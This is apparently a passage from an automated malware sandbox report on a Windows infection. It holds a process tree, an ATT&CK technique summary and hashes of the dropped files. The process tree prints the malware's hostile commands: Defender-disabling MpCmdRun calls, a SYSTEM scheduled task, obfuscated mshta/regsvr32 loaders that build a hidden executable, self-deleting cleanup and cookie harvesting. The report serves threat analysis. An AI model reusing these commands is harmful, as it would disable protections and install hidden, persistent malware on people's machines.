                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 680
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:4632
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 640
                                                                            7⤵
                                                                            • Program crash
                                                                            PID:4260
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 1080
                                                                            7⤵
                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                            • Program crash
                                                                            PID:592
                                                                        • C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe
                                                                          "C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of SetThreadContext
                                                                          PID:4628
                                                                          • C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe
                                                                            "{path}"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Checks processor information in registry
                                                                            PID:2884
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im 5cKKzdI9KUBiKfIGDdsMiFM5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5cKKzdI9KUBiKfIGDdsMiFM5.exe" & del C:\ProgramData\*.dll & exit
                                                                              8⤵
                                                                                PID:4336
                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                  taskkill /im 5cKKzdI9KUBiKfIGDdsMiFM5.exe /f
                                                                                  9⤵
                                                                                  • Kills process with taskkill
                                                                                  PID:4504
                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                  timeout /t 6
                                                                                  9⤵
                                                                                  • Delays execution with timeout.exe
                                                                                  PID:4360
                                                                          • C:\Users\Admin\Documents\StpKldNxi7nnEMnxYLjpwdNK.exe
                                                                            "C:\Users\Admin\Documents\StpKldNxi7nnEMnxYLjpwdNK.exe"
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            PID:4552
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4212
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                              • Executes dropped EXE
                                                                              PID:4632
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:4524
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:4356
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 708 -s 448
                                                                            4⤵
                                                                            • Program crash
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:3484
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                      1⤵
                                                                      • Suspicious use of SetThreadContext
                                                                      • Modifies registry class
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:2976
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                        2⤵
                                                                        • Checks processor information in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        • Modifies registry class
                                                                        PID:4224
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                        2⤵
                                                                        • Drops file in System32 directory
                                                                        • Checks processor information in registry
                                                                        • Modifies data under HKEY_USERS
                                                                        • Modifies registry class
                                                                        PID:4304
                                                                    • C:\Windows\system32\rUNdlL32.eXe
                                                                      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                      1⤵
                                                                      • Process spawned unexpected child process
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:3576
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                        2⤵
                                                                        • Loads dropped DLL
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        • Suspicious use of WriteProcessMemory
                                                                        PID:4112
                                                                    • C:\Windows\system32\rundll32.exe
                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                      1⤵
                                                                      • Process spawned unexpected child process
                                                                      PID:3852
                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                        2⤵
                                                                        • Loads dropped DLL
                                                                        • Modifies registry class
                                                                        PID:4156
                                                                    • C:\Windows\servicing\TrustedInstaller.exe
                                                                      C:\Windows\servicing\TrustedInstaller.exe
                                                                      1⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      • Checks processor information in registry
                                                                      PID:4580
                                                                    • \??\c:\windows\system32\svchost.exe
                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                      1⤵
                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                      • Executes dropped EXE
                                                                      PID:4576
                                                                    • C:\Windows\System32\slui.exe
                                                                      C:\Windows\System32\slui.exe -Embedding
                                                                      1⤵
                                                                        PID:684
                                                                      • C:\Users\Admin\AppData\Local\Temp\F902.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\F902.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:152
                                                                      • C:\Users\Admin\AppData\Local\Temp\8313.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\8313.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:508
                                                                      • C:\Users\Admin\AppData\Local\Temp\F1EB.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\F1EB.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Checks BIOS information in registry
                                                                        • Checks whether UAC is enabled
                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                        PID:4132
                                                                      • C:\Users\Admin\AppData\Local\Temp\5103.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\5103.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:2220
                                                                      • C:\Users\Admin\AppData\Local\Temp\5D0B.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\5D0B.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:4604
                                                                      • C:\Users\Admin\AppData\Local\Temp\6847.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\6847.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        PID:4920
                                                                      • C:\Users\Admin\AppData\Local\Temp\7613.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\7613.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        PID:2304
                                                                      • C:\Users\Admin\AppData\Local\Temp\BA02.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\BA02.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:4252
                                                                      • C:\Users\Admin\AppData\Local\Temp\C483.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\C483.exe
                                                                        1⤵
                                                                        • Executes dropped EXE
                                                                        • Drops file in Windows directory
                                                                        PID:1860
                                                                        • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                          2⤵
                                                                            PID:1976
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks /create /sc minute /ED "12/12/2022" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                            2⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:4504
                                                                          • C:\Windows\System\svchost.exe
                                                                            "C:\Windows\System\svchost.exe" formal
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            PID:1892
                                                                            • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                              "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All -Set-Mp Preference -DisableIOAVProtection $True -DisableRealtimeMonitoring $True -Force
                                                                              3⤵
                                                                                PID:1908
                                                                              • C:\Windows\System\spoolsv.exe
                                                                                "C:\Windows\System\spoolsv.exe" --MaxCircuitDirtiness 60 --NewCircuitPeriod 1 --MaxClientCircuitsPending 1024 --OptimisticData 1 --KeepalivePeriod 30 --CircuitBuildTimeout 10 --EnforceDistinctSubnets 0 --HardwareAccel 1 --UseEntryGuards 0
                                                                                3⤵
                                                                                  PID:352
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:4408
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                  PID:2292
                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                  1⤵
                                                                                    PID:3252
                                                                                  • C:\Windows\explorer.exe
                                                                                    C:\Windows\explorer.exe
                                                                                    1⤵
                                                                                      PID:3280
                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                      1⤵
                                                                                        PID:4484
                                                                                      • C:\Windows\explorer.exe
                                                                                        C:\Windows\explorer.exe
                                                                                        1⤵
                                                                                          PID:2428
                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                          1⤵
                                                                                            PID:3064
                                                                                          • C:\Windows\explorer.exe
                                                                                            C:\Windows\explorer.exe
                                                                                            1⤵
                                                                                              PID:428
                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                              1⤵
                                                                                                PID:3968
                                                                                              • C:\Users\Admin\AppData\Local\Temp\194B.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\194B.exe
                                                                                                1⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2284
                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\194B.exe"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF """" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\194B.exe"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                  2⤵
                                                                                                    PID:5112
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\194B.exe" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "" == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\194B.exe" ) do taskkill /IM "%~nxu" -F
                                                                                                      3⤵
                                                                                                        PID:4580
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE
                                                                                                          ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ
                                                                                                          4⤵
                                                                                                            PID:3868
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              "C:\Windows\System32\mshta.exe" vbSCRIPt: cLOSE ( cREATeoBJECt ("WSCRiPt.SHELl" ). RUn ( "CmD /C tyPE ""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF ""/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ "" == """" for %u in (""C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE"" ) do taskkill /IM ""%~nxu"" -F " ,0 ,trUe ) )
                                                                                                              5⤵
                                                                                                                PID:524
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /C tyPE "C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" > ..\6EZJJWJwF~OVKR.ExE && sTaRT ..\6EzjJWjWf~OVKR.Exe /P_Y8a5JuWcFqIugTe3zu0e0JtIZJ & iF "/P_Y8a5JuWcFqIugTe3zu0e0JtIZJ " == "" for %u in ("C:\Users\Admin\AppData\Local\Temp\6EZJJWJwF~OVKR.ExE" ) do taskkill /IM "%~nxu" -F
                                                                                                                  6⤵
                                                                                                                    PID:4452
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" VbScriPt: CLosE ( CReATEoBJECT ( "WScRiPT.shelL" ). RUN ( "C:\Windows\system32\cmd.exe /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = ""MZ"" > c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A + EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q * " , 0 , tRUE ) )
                                                                                                                  5⤵
                                                                                                                    PID:4936
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /q /c echo raH5C%RANdOm%S5SL8> EB_HYL.2J & EchO | SEt /P = "MZ" >c2Y3YxsZ.M9Z & coPy /B /y C2Y3YxsZ.m9Z + yWVx3x_.3UY + 6_P_Y4.PCT + dO~RV5TB.TuG + CAKMOv5L.OJ + ZOWCN.08 + G~EBG.A +EB_HyL.2J ..\BKZz.P & StArt regsvr32 ..\BkZz.p /u -S & Del /Q *
                                                                                                                      6⤵
                                                                                                                        PID:592
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" EchO "
                                                                                                                          7⤵
                                                                                                                            PID:3148
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>c2Y3YxsZ.M9Z"
                                                                                                                            7⤵
                                                                                                                              PID:600
                                                                                                                            • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                              regsvr32 ..\BkZz.p /u -S
                                                                                                                              7⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:5088
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /IM "194B.exe" -F
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3456
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1A17.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1A17.exe
                                                                                                                  1⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:3752
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 1A17.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1A17.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                    2⤵
                                                                                                                      PID:3688
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /im 1A17.exe /f
                                                                                                                        3⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:3720
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout /t 6
                                                                                                                        3⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:3184
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1B8F.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\1B8F.exe
                                                                                                                    1⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:4132
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1B8F.exe
                                                                                                                      "{path}"
                                                                                                                      2⤵
                                                                                                                        PID:1848
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\FBB7.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\FBB7.exe
                                                                                                                      1⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Checks processor information in registry
                                                                                                                      PID:1124
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im FBB7.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\FBB7.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                        2⤵
                                                                                                                          PID:2016
                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                            taskkill /im FBB7.exe /f
                                                                                                                            3⤵
                                                                                                                            • Kills process with taskkill
                                                                                                                            PID:3936
                                                                                                                          • C:\Windows\SysWOW64\timeout.exe
                                                                                                                            timeout /t 6
                                                                                                                            3⤵
                                                                                                                            • Delays execution with timeout.exe
                                                                                                                            PID:1404

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                      Execution

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Persistence

                                                                                                                      Modify Existing Service

                                                                                                                      1
                                                                                                                      T1031

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      2
                                                                                                                      T1060

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Privilege Escalation

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Defense Evasion

                                                                                                                      Modify Registry

                                                                                                                      3
                                                                                                                      T1112

                                                                                                                      Disabling Security Tools

                                                                                                                      1
                                                                                                                      T1089

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      Install Root Certificate

                                                                                                                      1
                                                                                                                      T1130

                                                                                                                      Credential Access

                                                                                                                      Credentials in Files

                                                                                                                      4
                                                                                                                      T1081

                                                                                                                      Discovery

                                                                                                                      Query Registry

                                                                                                                      6
                                                                                                                      T1012

                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                      1
                                                                                                                      T1497

                                                                                                                      System Information Discovery

                                                                                                                      6
                                                                                                                      T1082

                                                                                                                      Peripheral Device Discovery

                                                                                                                      1
                                                                                                                      T1120

                                                                                                                      Collection

                                                                                                                      Data from Local System

                                                                                                                      4
                                                                                                                      T1005

                                                                                                                      Command and Control

                                                                                                                      Web Service

                                                                                                                      1
                                                                                                                      T1102

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        213e00f202cd18120a1e44ea3a93d267

                                                                                                                        SHA1

                                                                                                                        ff07223275c627f04f64b8dc691a2e9eb0239883

                                                                                                                        SHA256

                                                                                                                        1ba80ea646c4375e8c7aa286eb25600013d13540d3324996db6a824d0ef9a7ae

                                                                                                                        SHA512

                                                                                                                        a4c9c443341d3943c9453ac1237e54f70f942a5c3c6032e86b942d8d16b8acffe61c0f3c1feec9d90d926be147e4272b477f423c830bee09287abf67596e78b2

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        35a5ab71990f411955cba00ae4dcc346

                                                                                                                        SHA1

                                                                                                                        c69ae00c634b1a9f0d90eb7564e2f14fcf5114bc

                                                                                                                        SHA256

                                                                                                                        5fbdd9a6cf0bc06c5e9d51ce01bb0e537a7581627be1420b29e36dec46067eee

                                                                                                                        SHA512

                                                                                                                        af70223952937f8eeb4d79b63367da28cfec1f9fa296966176ff574d20702443f8e1209633b9505232640ea4442f251b830e51b4c8acc3dba67b28ecf5b4a5d5

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
                                                                                                                        MD5

                                                                                                                        01f3db88e96dcc686e058d76cae36b47

                                                                                                                        SHA1

                                                                                                                        ac394852bab4a12460be1d9ded679f762510f445

                                                                                                                        SHA256

                                                                                                                        408a12a9c747d7eb64c68474280be3f65a6e81e5025a8ac5d533f51225b71200

                                                                                                                        SHA512

                                                                                                                        00af4605df8efe9f93ae7da409cb3dcd60f4c5c5dae15e84e3d2371ba2ba7c200f73bebe988b850f113657609b784e87bd43297968917f7a05d4803c47ed2b1f

                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
                                                                                                                        MD5

                                                                                                                        e7146584284dba285d1c3162988c8ac6

                                                                                                                        SHA1

                                                                                                                        925462bf1bc9bcdfc5884ec92dc7aa106d81101d

                                                                                                                        SHA256

                                                                                                                        5210113c1e591812eb7fa088897578bd7dfaa05418ee51a6d21e0040870bd136

                                                                                                                        SHA512

                                                                                                                        2d634c5b697f91477f3e5f6865557ef0f064b583079a46d4a7235f9878702db0eb03ba801c7c73837726b1149b8ab62611956665e8c87bd77791f6ad1c7ca87b

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\libcurl.dll
                                                                                                                        MD5

                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                        SHA1

                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                        SHA256

                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                        SHA512

                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\libcurlpp.dll
                                                                                                                        MD5

                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                        SHA1

                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                        SHA256

                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                        SHA512

                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\libgcc_s_dw2-1.dll
                                                                                                                        MD5

                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                        SHA1

                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                        SHA256

                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                        SHA512

                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\libstdc++-6.dll
                                                                                                                        MD5

                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                        SHA1

                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                        SHA256

                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                        SHA512

                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\libwinpthread-1.dll
                                                                                                                        MD5

                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                        SHA1

                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                        SHA256

                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                        SHA512

                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\setup_install.exe
                                                                                                                        MD5

                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                        SHA1

                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                        SHA256

                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                        SHA512

                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\setup_install.exe
                                                                                                                        MD5

                                                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                        SHA1

                                                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                        SHA256

                                                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                        SHA512

                                                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.exe
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.exe
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_1.txt
                                                                                                                        MD5

                                                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                                                        SHA1

                                                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                                                        SHA256

                                                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                                                        SHA512

                                                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS4DAD8864\sonia_2.exe
                                                                                                                        MD5

